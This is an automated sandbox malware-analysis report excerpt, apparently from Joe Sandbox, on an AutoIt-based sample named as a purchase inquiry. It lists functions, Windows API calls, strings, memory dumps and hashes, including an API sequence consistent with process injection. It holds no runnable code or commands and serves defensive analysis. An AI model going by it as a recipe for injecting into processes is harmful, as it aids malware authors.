                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?), ref: 00E47698
                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?), ref: 00E476A8
                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?), ref: 00E476B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          • Opcode ID: 66ac778c42a7aa14c6639086be75d3400b364568701e5eaeb16f459abde653f1
                                          • Instruction ID: 53b1eba8a386c19fe8036168bead9219992e9c3939d324c0902e3e2e76537391
                                          • Opcode Fuzzy Hash: 66ac778c42a7aa14c6639086be75d3400b364568701e5eaeb16f459abde653f1
                                          • Instruction Fuzzy Hash: 9901B1B2604614BFEB108F19EC04AAA7FAEEF44751F150068FD48E2211EB31DD4487E0
                                          Function 00DF69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00EB62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DF4F6F
                                          • _free.LIBCMT ref: 00E2E68C
                                          • _free.LIBCMT ref: 00E2E6D3
                                            • Part of subcall function 00DF6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DF6D0D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                          • API String ID: 2861923089-1757145024
                                          • Opcode ID: 2f7de4d1db31e9ea6f87c79634c0c4746059917a18b7ce1eaf53950bc3bf4046
                                          • Instruction ID: 5207fe9298b0244aea691a7f5f2db65cf32a75299995d7d4300af5cac969a02c
                                          • Opcode Fuzzy Hash: 2f7de4d1db31e9ea6f87c79634c0c4746059917a18b7ce1eaf53950bc3bf4046
                                          • Instruction Fuzzy Hash: A8918D71910229AFCF04EFA4E8919EDB7B4FF18314F14946AF915BB291EB30A945CB60
                                          Function 00DF35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00DF35A1,SwapMouseButtons,00000004,?), ref: 00DF35D4
                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00DF35A1,SwapMouseButtons,00000004,?,?,?,?,00DF2754), ref: 00DF35F5
                                          • RegCloseKey.KERNELBASE(00000000,?,?,00DF35A1,SwapMouseButtons,00000004,?,?,?,?,00DF2754), ref: 00DF3617
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: f6d1b6b9ff74f834a5f465b076e696d531ba66f3069fa1c7a26488ee76039487
                                          • Instruction ID: 32ba80a2f5ed131cb4ced65aec5ca90a1c363a290fcdc3713b7b33bab66cb3f9
                                          • Opcode Fuzzy Hash: f6d1b6b9ff74f834a5f465b076e696d531ba66f3069fa1c7a26488ee76039487
                                          • Instruction Fuzzy Hash: 1811457161020CBFDF20CF65DC80ABEBBB8EF04740F028469E909E7210E271DE449BA0
                                          Function 00FF12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 00FF1A5B
                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FF1AF1
                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FF1B13
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1690070618.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_ff0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                          • String ID:
                                          • API String ID: 2438371351-0
                                          • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                          • Instruction ID: 0e598af44ad98f44305afe1055bea19114cba3979b6a8293ba3e1f5dc4b70b73
                                          • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                          • Instruction Fuzzy Hash: 4662FE30A14258DBEB24CBA4C850BEEB371FF58700F1091A9D20DEB3A4E7759E81DB59
                                          Function 00E476C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 338bef8d9402d040924b2428fb5d3134793226d70eda938fea1b6002b28d5b5c
                                          • Instruction ID: 3b064a6e8f755e94ae810bccfed09efff4cc9bb5db24bbc568c4d0aec67230f2
                                          • Opcode Fuzzy Hash: 338bef8d9402d040924b2428fb5d3134793226d70eda938fea1b6002b28d5b5c
                                          • Instruction Fuzzy Hash: D3C18E74A04216EFCB14CF94D888EAEB7F5FF88714B119599E985EB250D730ED81CB90
                                          Function 00E683A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 00E683D8
                                          • CoUninitialize.OLE32 ref: 00E683E3
                                            • Part of subcall function 00E4DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E4DAC5
                                          • VariantInit.OLEAUT32(?), ref: 00E683EE
                                          • VariantClear.OLEAUT32(?), ref: 00E686BF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                          • String ID:
                                          • API String ID: 780911581-0
                                          • Opcode ID: 1a805c0c92e84619c06989c686c36bb5afcda683e48764478905d346a311913d
                                          • Instruction ID: 6c64d75a5e97983c26cbb53266b79400cf6074e81ad74ad4ca73cdd44f19a3dc
                                          • Opcode Fuzzy Hash: 1a805c0c92e84619c06989c686c36bb5afcda683e48764478905d346a311913d
                                          • Instruction Fuzzy Hash: 3BA16B756447019FCB10DF24D591B2AB7E4FF88354F059548FA9AAB3A1CB70EC44CB62
                                          Function 00E597E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF5045: _fseek.LIBCMT ref: 00DF505D
                                            • Part of subcall function 00E599BE: _wcscmp.LIBCMT ref: 00E59AAE
                                            • Part of subcall function 00E599BE: _wcscmp.LIBCMT ref: 00E59AC1
                                          • _free.LIBCMT ref: 00E5992C
                                          • _free.LIBCMT ref: 00E59933
                                          • _free.LIBCMT ref: 00E5999E
                                            • Part of subcall function 00E12F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E19C64), ref: 00E12FA9
                                            • Part of subcall function 00E12F95: GetLastError.KERNEL32(00000000,?,00E19C64), ref: 00E12FBB
                                          • _free.LIBCMT ref: 00E599A6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                          • String ID:
                                          • API String ID: 1552873950-0
                                          • Opcode ID: 5c495b0b21d28be1d374838fa88e788ff3099b5f50b4cf91438e6cc607167dd1
                                          • Instruction ID: bd09bdac5beaec4cc3d9343970fcd6a4382209195a4070354b3e77bf68f73af6
                                          • Opcode Fuzzy Hash: 5c495b0b21d28be1d374838fa88e788ff3099b5f50b4cf91438e6cc607167dd1
                                          • Instruction Fuzzy Hash: C55161B1904258EFDF249F64DC45AEEBBB9EF48300F00449EB609B7242DB315A94CF69
                                          Function 00E1493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                          • String ID:
                                          • API String ID: 2782032738-0
                                          • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                          • Instruction ID: 4fae192645ec0fa681e63638cbd1ec943ddd48b85d5c35af0317a5e079e6c8e1
                                          • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                          • Instruction Fuzzy Hash: 4541C5F16006069BDB18CE69C8809EF77A6EF84364B24A17DE855A77C0E7719DC08B44
                                          Function 00DF4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00DF4560
                                            • Part of subcall function 00DF410D: _memset.LIBCMT ref: 00DF418D
                                            • Part of subcall function 00DF410D: _wcscpy.LIBCMT ref: 00DF41E1
                                            • Part of subcall function 00DF410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DF41F1
                                          • KillTimer.USER32(?,00000001,?,?), ref: 00DF45B5
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DF45C4
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E2D6CE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                          • String ID:
                                          • API String ID: 1378193009-0
                                          • Opcode ID: a1688d0bbe4c9ea85e8a911ff5a2a807dad283e001a23042e5a7818f0928ca2e
                                          • Instruction ID: f075cfde408fcdafe0c7291f19afa487f3cee7e07ce41bc0e4528f71fcb48258
                                          • Opcode Fuzzy Hash: a1688d0bbe4c9ea85e8a911ff5a2a807dad283e001a23042e5a7818f0928ca2e
                                          • Instruction Fuzzy Hash: 0921A770908798AFEB329B24DC55BF7BBEC9F01308F04509EE79E66285C7745A888B51
                                          Function 00DF4DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: AU3!P/$EA06
                                          • API String ID: 4104443479-182974850
                                          • Opcode ID: a827ca9066639a7f52467c487570fd6915d21a9df6d0ba3c234ad3c3e6758631
                                          • Instruction ID: dad628907d9213083d702d0b5e4f7b2c8746002cdbcf02ef3e087a607d7bbd7c
                                          • Opcode Fuzzy Hash: a827ca9066639a7f52467c487570fd6915d21a9df6d0ba3c234ad3c3e6758631
                                          • Instruction Fuzzy Hash: B5415D32A0415C5BDF119B649C527BF7FA5EF05300F6EC065FF82AB286D5619E8483B1
                                          Function 00DF73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E2EE62
                                          • GetOpenFileNameW.COMDLG32(?), ref: 00E2EEAC
                                            • Part of subcall function 00DF48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DF48A1,?,?,00DF37C0,?), ref: 00DF48CE
                                            • Part of subcall function 00E109D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E109F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Name$Path$FileFullLongOpen_memset
                                          • String ID: X
                                          • API String ID: 3777226403-3081909835
                                          • Opcode ID: ec89091aff0e0f67535518f790edec1406fa6050d66744164216ca645dd81a23
                                          • Instruction ID: 00d425671d5d2e3cee8b2a1a8994050abf98818955ef2f9c961c23cfe611bc93
                                          • Opcode Fuzzy Hash: ec89091aff0e0f67535518f790edec1406fa6050d66744164216ca645dd81a23
                                          • Instruction Fuzzy Hash: 4A21A131A0025C9BCB11DF94DC45BFE7BF8AF49304F00805AE509BB242DBB459898FA1
                                          Function 00E5901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __fread_nolock_memmove
                                          • String ID: EA06
                                          • API String ID: 1988441806-3962188686
                                          • Opcode ID: 58177dff9ba039adf8db78fe548e047f0241359ad15251cb650c863a87c4dd21
                                          • Instruction ID: b4f65ae035c4c2067615354aa7743bb8fa1a096b809a6c212c64713732a60dc8
                                          • Opcode Fuzzy Hash: 58177dff9ba039adf8db78fe548e047f0241359ad15251cb650c863a87c4dd21
                                          • Instruction Fuzzy Hash: 4501F972C04258AEDB28C6A8C856EEE7BF8DB05301F00459AF552E2181E5B5A608CB60
                                          Function 00E59B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00E59B82
                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E59B99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Temp$FileNamePath
                                          • String ID: aut
                                          • API String ID: 3285503233-3010740371
                                          • Opcode ID: 2dde86afedd1f544f12d0f2f3719f5649ed99ed940c936017a04e3b6527de3ba
                                          • Instruction ID: 2587cd1861a8f2792c31c58970cf61e247e2198d136222ced4877afd4d46befb
                                          • Opcode Fuzzy Hash: 2dde86afedd1f544f12d0f2f3719f5649ed99ed940c936017a04e3b6527de3ba
                                          • Instruction Fuzzy Hash: FFD05B7554030DAFDB10DB90DC0DF9A776CD704701F0041B1FE54A50B2EEB055D98B91
                                          Function 00E6CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 967c74f33dc6d4dd2cdd67b30cc8d957edee3fba520482569596734f00349737
                                          • Instruction ID: d74a01a066213312f3fb6f9898fdf4b4a311ea4eb6062d06a94def9e921ff50c
                                          • Opcode Fuzzy Hash: 967c74f33dc6d4dd2cdd67b30cc8d957edee3fba520482569596734f00349737
                                          • Instruction Fuzzy Hash: 05F16870A083059FC714DF28C890A6ABBE5FF88354F54992EF899AB351D730E945CF92
                                          Function 00DF43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00DF4401
                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DF44A6
                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DF44C3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_$_memset
                                          • String ID:
                                          • API String ID: 1505330794-0
                                          • Opcode ID: abf17293283fc209df16e6a03e899287be528e3f858cca67307b36b2b1baabe2
                                          • Instruction ID: 11b942431fea2226b8688114db5dd38473a38fe657eda2b79577146592be08b5
                                          • Opcode Fuzzy Hash: abf17293283fc209df16e6a03e899287be528e3f858cca67307b36b2b1baabe2
                                          • Instruction Fuzzy Hash: 9D3184705047059FD721DF35D8847A7BBE4FB48304F044A2EF69AA3250D7B5A948CBA2
                                          Function 00E1594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __FF_MSGBANNER.LIBCMT ref: 00E15963
                                            • Part of subcall function 00E1A3AB: __NMSG_WRITE.LIBCMT ref: 00E1A3D2
                                            • Part of subcall function 00E1A3AB: __NMSG_WRITE.LIBCMT ref: 00E1A3DC
                                          • __NMSG_WRITE.LIBCMT ref: 00E1596A
                                            • Part of subcall function 00E1A408: GetModuleFileNameW.KERNEL32(00000000,00EB43BA,00000104,?,00000001,00000000), ref: 00E1A49A
                                            • Part of subcall function 00E1A408: ___crtMessageBoxW.LIBCMT ref: 00E1A548
                                            • Part of subcall function 00E132DF: ___crtCorExitProcess.LIBCMT ref: 00E132E5
                                            • Part of subcall function 00E132DF: ExitProcess.KERNEL32 ref: 00E132EE
                                            • Part of subcall function 00E18D68: __getptd_noexit.LIBCMT ref: 00E18D68
                                          • RtlAllocateHeap.NTDLL(01780000,00000000,00000001,00000000,?,?,?,00E11013,?), ref: 00E1598F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                          • String ID:
                                          • API String ID: 1372826849-0
                                          • Opcode ID: d9396c84ce43117cfe21d20f8de244d38a639f5caacfecb4fbcafd206f99a4e1
                                          • Instruction ID: c51ac2e623567c0ea13f6a48c8e9d400bd227ef2eda3683c6a509c1096230c71
                                          • Opcode Fuzzy Hash: d9396c84ce43117cfe21d20f8de244d38a639f5caacfecb4fbcafd206f99a4e1
                                          • Instruction Fuzzy Hash: 0F01D672201716DEE6113B35EC42AEE72D89FC1734F502136F420BA1D1DA709DC18662
                                          Function 00E59B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E597D2,?,?,?,?,?,00000004), ref: 00E59B45
